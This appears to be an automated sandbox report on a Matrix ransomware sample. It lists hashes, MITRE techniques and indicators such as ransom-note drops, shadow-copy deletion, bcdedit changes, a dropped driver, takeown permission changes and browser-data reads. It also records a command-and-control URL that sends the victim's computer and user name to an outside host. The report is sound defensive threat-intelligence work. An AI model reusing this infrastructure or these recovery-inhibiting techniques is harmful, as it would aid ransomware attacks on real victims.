matrix | 67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a

Analysis

max time kernel
94s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
28-12-2022 18:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
Size

1.2MB
MD5

c50c17057fc6ea67bc579196f1f73712
SHA1

44495db58fa7c94db840a3f696c8f546a5fce2d1
SHA256

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a
SHA512

7c5eb6317b0a51ae93302adb223d6163a5c771d5b1d8d77462c2463c37f32e0f7f957526a36e39ae5272687e4ebe2faf2d02e68601bc87afc95fc9d7145538aa
SSDEEP

24576:pxsxl/OOeI7RC4CJR5ez+IlnRJE5rABxPJhPPT/q:8fjRERAhPPzq

Score

10^/10

matrix discovery evasion persistence ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://myexternalip.com/raw

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310091\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\All Users\Microsoft\Diagnosis\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Microsoft Office 15\ClientX64\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\nl\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\be\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ha-Latn-NG\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa-Arab-PK\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\default_apps\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Google\Chrome\Application\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mt-MT\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wvpppa2c.Admin\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0fx48ci0.default-release\storage\default\moz-extension+++08d35b16-270d-4ee9-b076-44e94a1b4f9d^userContextId=4294967295\idb\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\etc\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\locale\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\ProgramData\Package Cache\{61087a79-ac85-455c-934d-1fa22cc64f36}\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\ProgramData\Package Cache\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}v14.30.30704\packages\vcRuntimeAdditional_amd64\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nl\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-PT\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Public\Libraries\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sq\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\Settings\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\es\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Cyrl-RS\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
HTTP URL	5	http://jostat.mygoodsday.org/addrecord.php?apikey=kok08_api_key&compuser=GBQHURCC\|Admin&sid=dMYzDrTBvyyXT9qX&phase=START
File created	C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\fil-PH\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\0fx48ci0.default-release\datareporting\archived\2022-08\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\B11EF506-7DE1-455F-8E20-67264DD4AF60\x-none.16\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ga-IE\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\skins\fonts\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\ProgramData\regid.1991-06.com.microsoft\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-IN\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Mozilla Firefox\fonts\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\fr-FR\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\Contacts\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\db\lib\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lv\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nso-ZA\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\ja-JP\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File created	C:\Program Files\Java\jdk1.8.0_66\include\!README_KOK08!.rtf	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

4124 bcdedit.exe
3004 bcdedit.exe
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

11 4184 powershell.exe
16 2476 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

hbFC3HC764.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS hbFC3HC764.exe

pid	process
4124	bcdedit.exe
3004	bcdedit.exe

flow	pid	process
11	4184	powershell.exe
16	2476	powershell.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	hbFC3HC764.exe

Executes dropped EXE 64 IoCs

Processes:

NWujmQJJ.exehbFC3HC7.exehbFC3HC764.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exehbFC3HC7.exe

pid	process
4148	NWujmQJJ.exe
4540	hbFC3HC7.exe
4564	hbFC3HC764.exe
2496	hbFC3HC7.exe
2332	hbFC3HC7.exe
3664	hbFC3HC7.exe
4012	hbFC3HC7.exe
4252	hbFC3HC7.exe
4072	hbFC3HC7.exe
4448	hbFC3HC7.exe
1952	hbFC3HC7.exe
3592	hbFC3HC7.exe
4092	hbFC3HC7.exe
1808	hbFC3HC7.exe
4764	hbFC3HC7.exe
776	hbFC3HC7.exe
5000	hbFC3HC7.exe
2832	hbFC3HC7.exe
676	hbFC3HC7.exe
4404	hbFC3HC7.exe
4848	hbFC3HC7.exe
4468	hbFC3HC7.exe
3416	hbFC3HC7.exe
3948	hbFC3HC7.exe
2560	hbFC3HC7.exe
1116	hbFC3HC7.exe
548	hbFC3HC7.exe
4888	hbFC3HC7.exe
4856	hbFC3HC7.exe
4876	hbFC3HC7.exe
2748	hbFC3HC7.exe
4764	hbFC3HC7.exe
3900	hbFC3HC7.exe
4380	hbFC3HC7.exe
5024	hbFC3HC7.exe
1232	hbFC3HC7.exe
2088	hbFC3HC7.exe
2584	hbFC3HC7.exe
2396	hbFC3HC7.exe
1608	hbFC3HC7.exe
1408	hbFC3HC7.exe
4476	hbFC3HC7.exe
4104	hbFC3HC7.exe
4280	hbFC3HC7.exe
3952	hbFC3HC7.exe
4472	hbFC3HC7.exe
1860	hbFC3HC7.exe
3208	hbFC3HC7.exe
2432	hbFC3HC7.exe
2744	hbFC3HC7.exe
4148	hbFC3HC7.exe
2476	hbFC3HC7.exe
4708	hbFC3HC7.exe
4996	hbFC3HC7.exe
428	hbFC3HC7.exe
304	hbFC3HC7.exe
3068	hbFC3HC7.exe
332	hbFC3HC7.exe
3772	hbFC3HC7.exe
4396	hbFC3HC7.exe
4228	hbFC3HC7.exe
1800	hbFC3HC7.exe
4736	hbFC3HC7.exe
4988	hbFC3HC7.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

hbFC3HC764.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	hbFC3HC764.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/4540-171-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/2496-183-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/2332-186-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/3664-193-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/4012-196-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/4252-204-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/4072-207-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/4448-214-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/1952-217-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral2/memory/1952-218-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/3592-225-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/4092-228-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/1808-235-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/4764-238-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/776-245-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/5000-247-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/2832-249-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/676-251-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/4404-253-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/4848-255-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/4468-257-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/3416-259-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/3948-261-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/2560-263-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/1116-265-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/548-267-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/4888-269-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/4856-271-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/4876-273-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/2748-275-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/4764-277-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe	upx
behavioral2/memory/3900-279-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

wscript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation wscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	wscript.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
4868	takeown.exe
4316	takeown.exe
4736	takeown.exe
4576	takeown.exe
304	takeown.exe
1556	takeown.exe
2232	takeown.exe
1156	takeown.exe
2232	takeown.exe
3168	takeown.exe
4804	takeown.exe
4480	takeown.exe
2812	takeown.exe
4124	takeown.exe
4672	takeown.exe
2820	takeown.exe
2212	takeown.exe
2664	takeown.exe
1036	takeown.exe
2288	takeown.exe
3752	takeown.exe
1032	takeown.exe
3620	takeown.exe
3768	takeown.exe
4684	takeown.exe
4244	takeown.exe
3896	takeown.exe
4716	takeown.exe
4952	takeown.exe
3504	takeown.exe
4828	takeown.exe
3744	takeown.exe
1916	takeown.exe
3952	takeown.exe
4228	takeown.exe
2980	takeown.exe
2424	takeown.exe
4840	takeown.exe
4756	takeown.exe
4584	takeown.exe
3504	takeown.exe
5000	takeown.exe
4720	takeown.exe
3768	takeown.exe
4924	takeown.exe
3328	takeown.exe
4268	takeown.exe
4924	takeown.exe
1428	takeown.exe
4016	takeown.exe
2396	takeown.exe
472	takeown.exe
2328	takeown.exe
3540	takeown.exe
2692	takeown.exe
3504	takeown.exe
4972	takeown.exe
4228	takeown.exe
1668	takeown.exe
280	takeown.exe
740	takeown.exe
3944	takeown.exe
1172	takeown.exe
2952	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 27 IoCs

Processes:

67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe

description	ioc	process
File opened for modification	C:\Users\Public\Pictures\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	67144b2940e08c635cdb9d38298b79027d604365de4947909d89d48a0694e74a.exe
